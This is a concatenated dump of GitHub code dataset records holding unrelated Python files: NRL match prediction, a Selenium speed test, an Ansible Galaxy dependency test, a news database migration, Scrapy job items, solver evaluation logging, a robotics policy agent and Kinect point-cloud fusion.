\"/var_imp.png\")\n\n if os.path.isfile(os.getcwd() + \"/var_imp.csv\"):\n os.remove(os.getcwd() + \"/var_imp.csv\")\n\n # back up parameters, metrics and artifacts to s3\n file_swap_s3(access_key, secret_key, os.getcwd() + '/mlruns/',\n \"s3://nrl-prediction-analysis.com/mlruns/\")\n file_swap_s3(access_key, secret_key, os.getcwd() + '/mlruns_artifacts/',\n \"s3://nrl-prediction-analysis.com/mlruns_artifacts/\")\n\n h2o.cluster().shutdown()\n\n print(\"Finished\")\n","repo_name":"nathan-bennett/nrl_statistical_analysis","sub_path":"predict_nrl_winners.py","file_name":"predict_nrl_winners.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26486796300","text":"from selenium.webdriver.common.by import By\nimport time\n\n\nclass Ookla:\n def __init__(self, driver):\n self.driver = driver\n\n def test_speed(self):\n self.driver.get(\"https://www.speedtest.net/\")\n time.sleep(1)\n\n self.driver.find_element(By.ID, '_evidon-banner-acceptbutton').click()\n time.sleep(1)\n\n self.driver.execute_script(\"window.scrollTo(0, 400)\")\n time.sleep(1)\n\n self.driver.find_element(By.CSS_SELECTOR, \".start-button a\").click()\n\n time.sleep(40)\n\n down_speed = float(self.driver.find_element(By.XPATH, '//*[@id=\"container\"]/div/div[3]/div/div/div/div[2]/div[3]/div[3]/div/div[3]/div/div/div[2]/div[1]/div[2]/div/div[2]/span').text)\n print(down_speed)\n # down_speed = 420\n return down_speed\n","repo_name":"tudorobretin/Automated-Complaints-Twitter-Bot","sub_path":"ookla.py","file_name":"ookla.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45030620824","text":"\"\"\"test_dependencies.py - Tests of collection dependency handling.\"\"\"\nimport logging\n\nimport attr\nimport pytest\n\nfrom ..conftest import is_hub_4_5\nfrom ..utils import ansible_galaxy, build_collection, get_client, set_certification\n\npytestmark = pytest.mark.qa # noqa: F821\n\nlogger = logging.getLogger(__name__)\n\n\n@attr.s\nclass DependencySpec:\n name = attr.ib()\n spec = attr.ib()\n retcode = attr.ib()\n xfail = attr.ib(default=False)\n\n\n@pytest.mark.all\n@pytest.mark.cli\n@pytest.mark.slow_in_cloud\n@pytest.mark.parametrize(\n \"params\",\n (\n DependencySpec(\"normal\", \"1.0.0\", 0),\n DependencySpec(\"exact\", \"=1.0.0\", 0),\n DependencySpec(\"lt\", \"<2.0.0\", 0),\n DependencySpec(\"lteq\", \"<=2.0.0\", 0),\n DependencySpec(\"gt\", \">0.9.0\", 0),\n DependencySpec(\"gteq\", \">=0.9.0\", 0),\n DependencySpec(\"range\", \">0.1.0,<1.0.1\", 0),\n DependencySpec(\"invalid\", \"this is just junk\", 1),\n # DependencySpec(\"carot\", \"^1.0.0\", 1, xfail=\"galaxy-dev#104\"),\n # DependencySpec(\"tilde\", \"~1.0.0\", 1, xfail=\"galaxy-dev#104\"),\n # DependencySpec(\"exception\", \">0.0.0,!=1.0.0\", 1, xfail=\"galaxy-dev#104\"),\n # DependencySpec(\"missing1\", \"2.0.0\", 1, xfail=\"galaxy-dev#104\"),\n # DependencySpec(\"missing2\", \">1.0.0\", 1, xfail=\"galaxy-dev#104\"),\n ),\n ids=lambda s: s.name,\n)\ndef test_collection_dependency_install(ansible_config, published, cleanup_collections,\n params, galaxy_client):\n \"\"\"Collections defining dependencies can be installed and their dependencies are installed\n as well.\n\n Currently some scenarios are XFAIL pending open tickets:\n - Dependency specs with no matching collections (galaxy-dev#104)\n - NPM-style specs (not part of semver) are invalid\n \"\"\"\n\n spec = params.spec\n retcode = params.retcode\n artifact2 = build_collection(dependencies={f\"{published.namespace}.{published.name}\": spec})\n\n try:\n ansible_galaxy(\n f\"collection publish {artifact2.filename} --server=automation_hub\",\n check_retcode=retcode,\n ansible_config=ansible_config(\"basic_user\")\n )\n except AssertionError:\n if params.xfail:\n return pytest.xfail()\n else:\n raise\n\n if retcode == 0:\n config = ansible_config(\"partner_engineer\")\n client = get_client(config)\n hub_4_5 = is_hub_4_5(ansible_config)\n gc = galaxy_client(\"partner_engineer\")\n set_certification(client, gc, artifact2, hub_4_5=hub_4_5)\n\n pid = ansible_galaxy(\n f\"collection install -vvv --ignore-cert \\\n {artifact2.namespace}.{artifact2.name}:{artifact2.version} --server\"\n f\"=automation_hub\",\n check_retcode=False,\n ansible_config=ansible_config(\"basic_user\"),\n # cleanup=False\n )\n\n try:\n assert (\n pid.returncode == retcode\n ), f\"Unexpected {'failure' if pid.returncode else 'success'} during installing \\\n {artifact2.namespace}.{artifact2.name}:{artifact2.version} \\\n with dependency {published.namespace}.{published.name}{spec}\"\n except AssertionError:\n raise\n","repo_name":"ansible/galaxy_ng","sub_path":"galaxy_ng/tests/integration/cli/test_dependencies.py","file_name":"test_dependencies.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"72"} +{"seq_id":"70133725674","text":"# -*- coding: utf-8 -*-\nimport re\nimport json\n#import logging\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import IntegrityError\nfrom jinja2 import Markup\nfrom html5tidy import tidy\nfrom ftfy import fix_text\n\nfrom niku import db_session\nfrom niku.models.core import Site, Article\nfrom niku.helpers.url import create_slug\n\n\nengine = create_engine('mysql+oursql://enang:yusup@localhost/liputan6_xxx?charset=latin1')\nconn = engine.connect()\n\n\n#logging.basicConfig(filename='migration.log')\n#logger = logging.getLogger('sqlalchemy.engine')\n#logger.setLevel(logging.DEBUG)\n\n# buat koleksi\nurls_txt = open('urls.txt', 'w')\n\n\ndef get_ids():\n result = conn.execute(\"select id from tbl_news\")\n ids = [row[0] for row in result]\n return sorted(ids)\n\n\ndef get_cats():\n result = conn.execute(\"select c.cat_id, c.cat_name, ch.channel_name \\\n from tbl_category as c, tbl_channel as ch \\\n where c.channel_id=ch.channel_id\")\n # FIXME: row[1] == nama kategori, dipake buat salah satu tag\n # apakah bener di lower() atau tidak, tentukan dulu\n cats = dict((row[0], [row[2].lower(), row[1].lower()]) for row in result)\n return cats\n\n\ndef get_news(id):\n result = conn.execute(\"select * from tbl_news where id = ?\", id)\n row = result.fetchone()\n return row\n\n\ndef clean_html(text):\n # banyak link ngaco di dalam berita, bersihin dulu\n text = re.sub(r'\"]+)>', r'', text)\n text = re.sub(r'', r'', text)\n text = text.replace('http:http', 'http')\n text = text.replace('http:// http://', 'http://')\n # baru mulai mengurus isi\n text = fix_text(text.strip())\n try:\n text = tidy(text, fragment=True, encoding='utf-8')\n except UnicodeDecodeError:\n pass\n # kenapa banyak banget backtick? it should be single quote!\n text = text.replace(\"`\", \"'\")\n # sebenernya sih: http://html5doctor.com/i-b-em-strong-element/\n # tapi demi konsistensi sama ckeditor...\n # FIXME: it's better to fix this in ckeditor instead\n text = text.replace('', '').replace('', '')\n text = text.replace('', '').replace('', '')\n try:\n text = Markup(text.decode('utf-8', 'replace')).unescape()\n except UnicodeEncodeError:\n # isinya apa sebenernya, udah diginiin, masih aja error nyink!\n pass\n # satu link lagi, terlalu aneh buat diedit di depan, harus belakangan\n text = re.sub(r'[\\\\\"]+(http://[\\w/.-]+)[\\\\\"]+', r'\"\\1\"', text)\n return text\n\n\n_junk_re1 = re.compile(r'[^\\w&\\- ]')\n_junk_re2 = re.compile(r'^(soal|fokus|kasus)')\n\n\ndef clean_tag(tag):\n try:\n tag = Markup(fix_text(tag.decode('utf-8'))).striptags()\n except UnicodeEncodeError:\n return None\n tag = _junk_re1.sub('', tag).strip()\n tag = _junk_re2.sub('', tag).strip()\n\n if not tag:\n return None\n if len(tag) < 3:\n return None\n if len(tag) > 40:\n return None\n if tag.isdigit():\n return None\n return tag\n\n\ndef migrate():\n # old db\n cats = get_cats()\n ids = get_ids()\n\n # new db\n top = Site.query.filter_by(name='top').first()\n news = Site.query.filter_by(name='news').first()\n showbiz = Site.query.filter_by(name='showbiz').first()\n bola = Site.query.filter_by(name='bola').first()\n health = Site.query.filter_by(name='health').first()\n tekno = Site.query.filter_by(name='tekno').first()\n\n # cek id terakhir yang sudah masuk di db baru\n last_article = Article.query.order_by('id desc').first()\n last_id = last_article.id if last_article else None\n\n for id in ids:\n # kalau udah ada di db baru, skip\n if id <= last_id:\n continue\n\n # normal: ambil data di db lama\n _news = get_news(id)\n\n try:\n kanal = cats[_news.cat_id][0]\n kategori = cats[_news.cat_id][1]\n except KeyError:\n # cat_id ngegantung tanpa kanal. channel_id 11 ada di mana?\n site = top\n else:\n if kanal in ['berita', 'buser']:\n if kategori == 'olah raga':\n site = bola\n else:\n site = news\n elif kanal in ['showbiz', 'musik']:\n site = showbiz\n elif kanal in ['sport', 'bola']:\n site = bola\n elif kanal == 'kesehatan':\n site = health\n elif kanal == 'tekno':\n site = tekno\n else:\n # otomotif, gayahidup, pemilu, citizen6\n site = top\n\n try:\n migrate_article(site, _news, kategori)\n except IntegrityError:\n # kita bukan makhluk dengan integritas!\n pass\n\n urls_txt.close()\n\n\n_href_re = re.compile(r'href=\"([\\w:/,.?=-]+\")>')\n\n\ndef migrate_article(site, news, cat_name):\n # buang berita yang tadinya tidak dipublish\n if news.publish == '0':\n return\n\n # buang bekasan scmusik.com, tidak valid!\n if news.title in ['About Us', 'Site Map', 'FAQ',\n 'Term Of Service', 'Contact Us']:\n return\n\n # bersihkan title berita yang mau diproses\n title = clean_html(news.title)\n\n # unpublish berita dari kanal-kanal yang musnah\n if site.name == 'top':\n published = False\n\n # unpublish berita-berita cuma selintas - 60 detik\n elif '60 Detik' in title or \\\n title.startswith('Intisari Liputan') or \\\n title in ['Lintas Daerah', 'Lintas Ekbis',\n 'Lintas Olahraga', 'Ragam Hiburan',\n 'Kriminal Sepekan', 'Kriminalitas Sepekan']:\n published = False\n else:\n published = True\n\n # cuma bikin slug buat berita yang dipublish\n if published:\n slug = create_slug(title)\n else:\n slug = None\n\n # shortdesc & content, bersihin dulu sebisanya\n shortdesc = clean_html(news.shortdesc)\n content = clean_html(news.news)\n\n # fix masalah date yang naudzubillah randomnnya\n if news.modified:\n published_time = news.publish_date\n last_modified = news.modified\n elif news.publish_date:\n published_time = news.publish_date\n last_modified = news.publish_date\n else:\n published_time = news.dates\n last_modified = news.dates\n\n article = Article(id=news.id,\n site=site,\n title=title,\n slug=slug,\n shortdesc=shortdesc,\n content=content,\n published=published,\n published_time=published_time,\n last_modified=last_modified\n )\n db_session.add(article)\n\n #### tags\n # merge isi kategori, prehead, terkait, keyword ke dalam satu list\n _tags1 = [cat_name]\n for words in [news.prehead, news.terkait, news.keyword]:\n if not words:\n continue\n _tags1 += words.split(',')\n\n # demi konsistensi: lowercase them all\n # FIXME: is this the right decision?\n _tags2 = [tag.lower() for tag in _tags1]\n\n ## tag tambahan\n # cat_id di bawah ini diambil dari tbl_category, cat_parent == 4\n if news.cat_id in ['94', '95', '96', '97', '98', '99',\n '100', '101', '102', '103']:\n _tags2.append('ekonomi')\n\n # bener gak ini masuk peristiwa?\n if news.cat_id in [2, 3, 6, 7, 9]:\n _tags2.append('peristiwa')\n\n # kanal musik masuk ke showbiz, kategori musik\n if news.cat_id in ['37', '38', '39', '40', '41', '42',\n '43', '44', '45', '86', '109', '123']:\n _tags2.append('musik')\n\n # daerah & ibukota itu berita nasional kan ya?\n for word in ['daerah', 'ibu kota', 'ibukota']:\n if word in _tags2:\n _tags2.append('nasional')\n\n # rename tag yang mesti direname\n _tags3 = []\n for tag in _tags2:\n tag = clean_tag(tag)\n if not tag:\n continue\n if tag in ['berita', 'lain-lain']:\n continue\n if tag == 'ekonomi & bisnis':\n tag = 'ekonomi'\n elif tag == 'luar negeri':\n tag = 'internasional'\n elif tag == 'ibu kota':\n tag = 'ibukota'\n elif tag.startswith('prediksi'):\n tag = 'prediksi'\n _tags3.append(tag)\n\n # buang duplikasi tag\n _tags4 = list(set(_tags3))\n\n # and insert 'em\n article.str_tags = _tags4\n\n db_session.commit()\n\n # terakhir, ngegrep url dari content, buat koleksi\n link = _href_re.findall(article.content)\n if link:\n js = json.dumps((news.id, link))\n urls_txt.write(js + '\\n')\n","repo_name":"enangyusup/sinau-python","sub_path":"kemek/niku_migrate/dbmigrate.py","file_name":"dbmigrate.py","file_ext":"py","file_size_in_byte":8689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14675948","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\nimport datetime\n\nimport scrapy\nimport time\nimport re\n\nfrom scrapy.loader.processors import MapCompose, Join\n\n\ndef reg_matcher(food, regular, *default_value):\n if isinstance(food, list):\n food = food[0]\n result = re.match(regular, food,re.S)\n if result:\n return result.group(1)\n\n return (lambda: \"\" if default_value is None else default_value)()\n\n\ndef handle_date(date):\n \"\"\"\n 处理日期\n :param date:\n :return:\n \"\"\"\n result = 0\n if \"天\" in date:\n match_result = re.match(\"(\\d+)\", date)\n days = lambda: int(match_result.group(1)) if match_result else 1\n result = datetime.date.today() - datetime.timedelta(days=days())\n # dateTime = time.strptime(dateTime.strftime(\"%Y-%m-%d %H:%M\"), \"%Y-%m-%d %H:%M\")\n result = int(time.mktime(result.timetuple()))\n elif \":\" in date:\n result = int(\n time.mktime(time.strptime((datetime.date.today().strftime(\"%Y-%m-%d \") + date), \"%Y-%m-%d %H:%M\")))\n elif \"-\" in date:\n result = int(time.mktime(time.strptime(date, \"%Y-%m-%d\")))\n else:\n result = int(time.time())\n return result\n\n\nclass BaseItem(scrapy.Item):\n \"\"\"\n 基础数据处理Item\n \"\"\"\n\n def render_insert_info(self):\n \"\"\"\n 用于返回SQL语句,以及参数值\n :return: SQL,params\n \"\"\"\n table_name = \"\"\"\"\"\"\n params = ()\n update_params = []\n return table_name, params, update_params\n\n\nclass FilterJoin(Join):\n def __init__(self, filter_regular, separator=u' '):\n super().__init__(separator)\n self.separator = separator\n self.filter = filter_regular\n\n def __call__(self, values):\n return self.separator.join(list(filter(lambda y: self.filter(y), values)))\n\n\nclass JobItem(BaseItem):\n \"\"\"\n 工作Item\n \"\"\"\n\n url = scrapy.Field()\n url_id = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?(\\d+).*\"))\n )\n title = scrapy.Field()\n salary_min = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?(\\d+).*\", 0) if \"-\" in x else 0)\n )\n salary_max = scrapy.Field(\n input_processor=MapCompose(\n lambda x: reg_matcher(x, \".*-(\\d+)?(k|K)\", 0) if \"-\" in x else 0)\n )\n exp_min = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?(\\d+).*\", 0) if \"-\" in x else 0)\n )\n exp_max = scrapy.Field(\n input_processor=MapCompose(\n lambda x: reg_matcher(x, \".*-(\\d+)?(年|$)\", 0) if \"-\" in x else 0)\n )\n degree = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?([\\u4E00-\\u9FA5]+).*\"))\n )\n type = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?([\\u4E00-\\u9FA5]+).*\"))\n )\n date = scrapy.Field(\n input_processor=MapCompose(\n lambda x: handle_date(reg_matcher(x, \".*?((\\d+天前)|(\\d+:\\d+)|(\\d{4}[年/-]\\d+($|[月/-])\\d*($|[号日]|)))\"))\n )\n )\n tags = scrapy.Field(output_processor=Join(\",\"))\n advantages = scrapy.Field()\n desc = scrapy.Field(output_processor=Join(\";\"))\n location = scrapy.Field(output_processor=FilterJoin(lambda x: \"地图\" not in x, \",\"))\n company_url = scrapy.Field()\n company_name = scrapy.Field(input_processor=MapCompose(lambda x: reg_matcher(x, \".*?([\\S]+).*\", \"\")))\n crawl_time = scrapy.Field()\n\n def render_insert_info(self):\n table_name = \"job\"\n params = dict(\n url=self['url'],\n url_id=self['url_id'],\n title=self['title'],\n salary_min=self['salary_min'],\n salary_max=self['salary_max'],\n exp_min=self['exp_min'],\n exp_max=self['exp_max'],\n degree=self['degree'],\n type=self['type'],\n date=self['date'],\n tags=self['tags'],\n advantages=self['advantages'],\n desc=self['desc'],\n location=self['location'],\n company_url=self['company_url'],\n company_name=self['company_name'],\n crawl_time=self['crawl_time'],\n crawl_update_time=int(time.time()),\n )\n update_params = [\n 'salary_min',\n 'salary_max',\n 'exp_min',\n 'exp_max',\n 'degree',\n 'location',\n \"crawl_update_time\"\n ]\n return table_name, params, update_params\n","repo_name":"ms-liu/ScrapySpider","sub_path":"ScrapySpider/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11604726465","text":"import pickle\nimport time\nfrom copy import deepcopy\n\nfrom joblib import Parallel, delayed\n\nfrom jobs.core import Job\nfrom metric_logging import log_scalar, log_scalar_metrics, MetricsAccumulator, log_text\nfrom supervised.int.gen_subgoal_data import generate_problems\n\nfrom visualization.seq_parse import logic_statement_to_seq_string, entity_to_seq_string\n\n\ndef solve_problem(solver, input_state):\n time_s = time.time()\n solver.construct_networks()\n solution, tree_metrics, root, trajectory_actions, additional_info = solver.solve(input_state)\n time_solving = time.time() - time_s\n return dict(\n solution=solution,\n tree_metrics=tree_metrics,\n root=root,\n trajectory_actions=trajectory_actions,\n time_solving=time_solving,\n input_problem=deepcopy(input_state),\n additional_info=additional_info\n )\n\n\nclass JobSolveINT(Job):\n def __init__(self,\n solver_class,\n n_jobs,\n n_parallel_workers,\n batch_size,\n budget_checkpoints=None,\n real_budget_checkpoints=None,\n log_solutions_limit=100,\n job_range=None,\n collect_solutions=None\n ):\n\n self.solver_class = solver_class\n self.n_jobs = n_jobs\n self.n_parallel_workers = n_parallel_workers\n self.batch_size = batch_size\n self.budget_checkpoints = budget_checkpoints\n self.real_budget_checkpoints = real_budget_checkpoints\n self.log_solutions_limit = log_solutions_limit\n self.job_range = job_range\n self.collect_solution = collect_solutions\n\n self.solved_stats = MetricsAccumulator()\n self.experiment_stats = MetricsAccumulator()\n self.calls_stats = MetricsAccumulator()\n self.distance_stats = MetricsAccumulator()\n\n self.verifications = dict()\n\n self.logged_solutions = 0\n\n if self.collect_solution is not None:\n self.collection = {}\n\n def execute(self):\n proofs_to_solve = generate_problems(self.n_jobs)\n\n solver = self.solver_class()\n # solver.construct_networks()\n\n total_time_start = time.time()\n\n jobs_done = 0\n jobs_to_do = self.n_jobs\n batch_num = 0\n\n while jobs_to_do > 0:\n jobs_in_batch = min(jobs_to_do, self.batch_size)\n boards_to_solve_in_batch = proofs_to_solve[jobs_done:jobs_done + jobs_in_batch]\n\n results = Parallel(n_jobs=self.n_parallel_workers, verbose=100)(\n delayed(solve_problem)(solver, input_problem[0]) for input_problem in boards_to_solve_in_batch\n )\n\n self.log_results(results, jobs_done)\n\n jobs_done += jobs_in_batch\n jobs_to_do -= jobs_in_batch\n batch_num += 1\n\n for metric, value in self.solved_stats.return_scalars().items():\n log_text('summary', f'{metric}, {value}')\n log_text('summary', f'Finished time , {time.time() - total_time_start}')\n\n def log_results(self, results, step):\n n_logs = len(results)\n for log_num, result in enumerate(results):\n log_scalar_metrics('tree', step+log_num, result['tree_metrics'])\n if self.logged_solutions < self.log_solutions_limit:\n self.log_solution(result['solution'], result['trajectory_actions'], result['input_problem'], step+log_num)\n solved = result['solution'] is not None\n self.experiment_stats.log_metric_to_accumulate('tested', 1)\n log_scalar_metrics('problems', step+log_num, self.experiment_stats.return_scalars())\n log_scalar('time_solving', step + log_num, result['time_solving'])\n\n if solved:\n self.solved_stats.log_metric_to_average('rate/all', 1)\n self.solved_stats.log_metric_to_accumulate('problems', 1)\n log_scalar('solution', step + log_num, 1)\n log_scalar('solution/length', step + log_num, len(result['trajectory_actions']))\n # assert False\n trajectory_actions = [str(action) for action in result['trajectory_actions']]\n trajectory = ', '.join(trajectory_actions)\n log_text('trajectory_actions', f'{step + log_num}: {trajectory}', False)\n log_scalar('solution/n_subgoals', step + log_num, len(result['solution']))\n\n # subgoal distances\n path = list(reversed(result['additional_info']['subgoal_distances']))\n if len(path) >= 1:\n for id in [0, 1, -1, -2]:\n log_scalar(f'solution/distances/step nb. {id}', step + log_num, path[id])\n self.distance_stats.log_metric_to_average(f'avg step nb. {id}', path[id])\n else:\n self.solved_stats.log_metric_to_average('rate/all', 0)\n self.solved_stats.log_metric_to_accumulate('problems', 0)\n log_scalar('solution', step+log_num, 0)\n log_scalar('solution/length', step + log_num, -1)\n log_text('trajectory_actions', f'{step + log_num}: unsolved', False)\n log_scalar('solution/n_subgoals', step + log_num, -1)\n\n log_scalar('verificator failed', step + log_num, result['additional_info']['verificator_failed'])\n\n log_scalar_metrics('predictions', step+log_num, result['additional_info']['predictions'])\n # log_scalar('problems', step + n_logs, step + n_logs)\n\n # if result['tree_metrics']['nodes'] < 100:\n for i, verification in enumerate(result['additional_info']['verifications']):\n if i in self.verifications.keys():\n self.verifications[i] = self.verifications[i] + verification\n else:\n self.verifications[i] = verification\n # else:\n # print('Too long episode:', result['tree_metrics']['nodes'], 'nodes')\n\n joint_calls = 0\n for key in result['additional_info']:\n if 'calls/' in key:\n self.calls_stats.log_metric_to_accumulate(key + '_sum', result['additional_info'][key])\n log_scalar(key, step + log_num, result['additional_info'][key])\n joint_calls += result['additional_info'][key]\n self.calls_stats.log_metric_to_accumulate('calls/joint_sum', joint_calls)\n log_scalar('calls/joint', step + log_num, joint_calls)\n\n if self.budget_checkpoints is not None:\n for budget in self.budget_checkpoints:\n if result['tree_metrics']['expanded_nodes'] <= budget and solved:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_exp_nodes', 1)\n else:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_exp_nodes', 0)\n\n if result['tree_metrics']['nodes'] <= budget and solved:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_nodes', 1)\n else:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_nodes', 0)\n\n if self.real_budget_checkpoints is not None:\n for budget in self.real_budget_checkpoints:\n if result['tree_metrics']['real_cost_final'] <= budget and solved:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_evaluations', 1)\n else:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_evaluations', 0)\n\n for i, verification in self.verifications.items():\n log_text(f'verifications of builder {i}', str(verification), False)\n log_text(f'(normalized) verifications of builder {i}',\n str([verification[0] / sum(verification[0]), verification[1] / sum(verification[1])]), False)\n\n log_scalar_metrics('solved', step+n_logs, self.solved_stats.return_scalars())\n log_scalar_metrics('calls', step+n_logs, self.calls_stats.return_scalars())\n log_scalar_metrics('solution/distances', step+n_logs, self.distance_stats.return_scalars())\n\n def log_solution(self, solution, trajectory_actions, input_problem, step):\n if solution is not None:\n solution_str = f'Problem {step} : {solution[0].hash} \\n'\n\n for subgoal_num, node in enumerate(solution[1:]):\n solution_str += f'subgoal {subgoal_num} : {node.hash} \\n'\n solution_str += '\\n \\n'\n solution_str += 'Actions: \\n'\n\n for action_num, action in enumerate(trajectory_actions):\n solution_str += f'action {action_num}: ({action[0]}, {[entity_to_seq_string(ent) for ent in action[1:]]} ) \\n'\n else:\n solution_str = f'Unsolved problem {step} : {logic_statement_to_seq_string(input_problem[\"observation\"][\"objectives\"][0])} \\n \\n'\n\n log_text('solution', solution_str, True)\n\n","repo_name":"TomaszOdrzygozdz/AdaSubS_colab","sub_path":"jobs/int/job_solve_int.py","file_name":"job_solve_int.py","file_ext":"py","file_size_in_byte":9062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39727331378","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom agents.agents_3d.tp.dqn_3d_tp import DQN3DTP\n\nclass Policy3DTP(DQN3DTP):\n def __init__(self, workspace, heightmap_size, device, lr=1e-4, gamma=0.9, sl=False, num_primitives=1,\n patch_size=24, num_rz=8, rz_range=(0, 7*np.pi/8)):\n super().__init__(workspace, heightmap_size, device, lr, gamma, sl, num_primitives, patch_size, num_rz, rz_range)\n\n # def update(self, batch):\n # batch_size = len(batch)\n # divide_factor = batch_size\n # small_batch_size = batch_size//divide_factor\n # loss = 0\n # for i in range(divide_factor):\n # small_batch = batch[small_batch_size*i:small_batch_size*(i+1)]\n # self._loadBatchToDevice(small_batch)\n # _, states, obs, action_idx, rewards, next_states, next_obs, non_final_masks, step_lefts, is_experts = self._loadLossCalcDict()\n # output = self.forwardFCN(states, obs[1], obs[0])\n # output = output.reshape(small_batch_size, -1)\n # target = action_idx[:, 2] * self.heightmap_size * self.heightmap_size + \\\n # action_idx[:, 0] * self.heightmap_size + \\\n # action_idx[:, 1]\n # loss += F.cross_entropy(output, target)/divide_factor\n # self.loss_calc_dict = {}\n #\n # self.place_optimizer.zero_grad()\n # self.pick_optimizer.zero_grad()\n # loss.backward()\n # self.place_optimizer.step()\n # self.pick_optimizer.step()\n #\n # self.loss_calc_dict = {}\n #\n # return loss.item(), torch.tensor(0.)\n\n\n def update(self, batch):\n batch_size = len(batch)\n self._loadBatchToDevice(batch)\n _, states, obs, action_idx, rewards, next_states, next_obs, non_final_masks, step_lefts, is_experts = self._loadLossCalcDict()\n obs, in_hands = obs\n mask_0 = states == 0\n mask_1 = states == 1\n if mask_0.sum():\n obs_0 = obs[mask_0]\n action_idx_0 = action_idx[mask_0]\n\n pick_loss = 0\n for i in range(mask_0.sum()):\n output = self.forwardPick(obs_0[i:i+1]).reshape(1, -1)\n target = action_idx_0[i:i+1, 2] * self.heightmap_size * self.heightmap_size + \\\n action_idx_0[i:i+1, 0] * self.heightmap_size + \\\n action_idx_0[i:i+1, 1]\n pick_loss += F.cross_entropy(output, target)/mask_0.sum()\n\n self.pick_optimizer.zero_grad()\n pick_loss.backward()\n self.pick_optimizer.step()\n else:\n pick_loss = torch.tensor(0)\n if mask_1.sum():\n obs_1 = obs[mask_1]\n in_hands_1 = in_hands[mask_1]\n action_idx_1 = action_idx[mask_1]\n\n place_loss = 0\n for i in range(mask_1.sum()):\n output = self.forwardPlace(in_hands_1[i:i+1], obs_1[i:i+1]).reshape(1, -1)\n target = action_idx_1[i:i+1, 2] * self.heightmap_size * self.heightmap_size + \\\n action_idx_1[i:i+1, 0] * self.heightmap_size + \\\n action_idx_1[i:i+1, 1]\n place_loss += F.cross_entropy(output, target)/mask_1.sum()\n\n self.place_optimizer.zero_grad()\n place_loss.backward()\n self.place_optimizer.step()\n else:\n place_loss = torch.tensor(0)\n\n self.loss_calc_dict = {}\n\n return (pick_loss.item(), place_loss.item()), torch.tensor(0.)","repo_name":"pointW/equi_q_corl21","sub_path":"agents/agents_3d/tp/policy_3d_tp.py","file_name":"policy_3d_tp.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"22666291700","text":"import click\nimport os\nimport numpy as np\nimport pickle as pkl\nimport glob\nimport cv2\nimport open3d as o3d\nimport matplotlib.pyplot as plt\n\nfrom kintools.core import camera\nfrom kintools.hardware import utils\n\n\ndef preprocess(d):\n d = d / 1000\n d = cv2.medianBlur(d, 5)\n d[d > 1.0] = 0\n # d[d < 0.2] = 0\n return d\n\n\ndef to_homogeneous(x):\n a = np.zeros((x.shape[0], 4))\n a[:, :3] = x\n a[:, 3] = 1\n return a\n\n\n@click.command()\n@click.option(\"--input_file\", \"-i\", default=\"\")\n@click.option(\"--output_folder\", \"-o\", default=\"\")\ndef main(input_file, output_folder):\n calibration = utils.load_calibration(\n \"/home/rstrudel/code/kinect2-utilities/calibration/paris_kinect2\"\n )\n ir_params = calibration[\"ir\"]\n camera_matrix = ir_params[\"cameraMatrix\"]\n dist = ir_params[\"distortionCoefficients\"]\n fx, fy, cx, cy = (\n camera_matrix[0, 0],\n camera_matrix[1, 1],\n camera_matrix[0, 2],\n camera_matrix[1, 2],\n )\n\n T_cam_tracker = np.array(\n [\n [0.997871, -0.006405, -0.064908, 0.034571],\n [-0.065077, -0.031177, -0.997393, -0.036484],\n [0.004364, 0.999493, -0.031527, 0.019005],\n [0.000000, 0.000000, 0.000000, 1.000000],\n ]\n )\n # T_cam_tracker[:3, :3] = T_cam_tracker[:3, :3]\n\n files = glob.glob(os.path.join(\"snap_depth_tracker\", \"*.pkl\"))\n files = sorted(files)\n cloud = np.zeros((0, 3))\n for i, input_file in enumerate(files):\n snap = pkl.load(open(input_file, \"rb\"))\n depth = snap[\"depth\"]\n T_tracker = snap[\"tracker\"]\n # if i == 0:\n # T_ref = T_tracker\n T_tracker_base = np.linalg.inv(T_tracker)\n # print(np.linalg.norm(T_tracker_ref[:3, 3]))\n depth = preprocess(depth)\n\n depth_pts_2d, depth_info = camera.depth_to_points(depth)\n depth_pts_3d = camera.unproject(depth_pts_2d, fx, fy, cx, cy)\n depth_pts_hom = to_homogeneous(depth_pts_3d)\n depth_pts_aligned = np.zeros_like(depth_pts_hom)\n for k, x in enumerate(depth_pts_hom):\n depth_pts_aligned[k] = (T_tracker_base @ T_cam_tracker).dot(x)\n # depth_pts_aligned[k] = x\n cloud = np.concatenate((cloud, depth_pts_aligned[:, :3]))\n np.savetxt(\n os.path.join(output_folder, \"res{}.npy\".format(i)),\n depth_pts_aligned[:, :3],\n )\n\n np.savetxt(os.path.join(output_folder, \"res_fusion.npy\"), cloud)\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(cloud)\n pcd_down = pcd.voxel_down_sample(0.02)\n o3d.visualization.draw_geometries([pcd_down])\n\n\nif __name__ == \"__main__\":\n 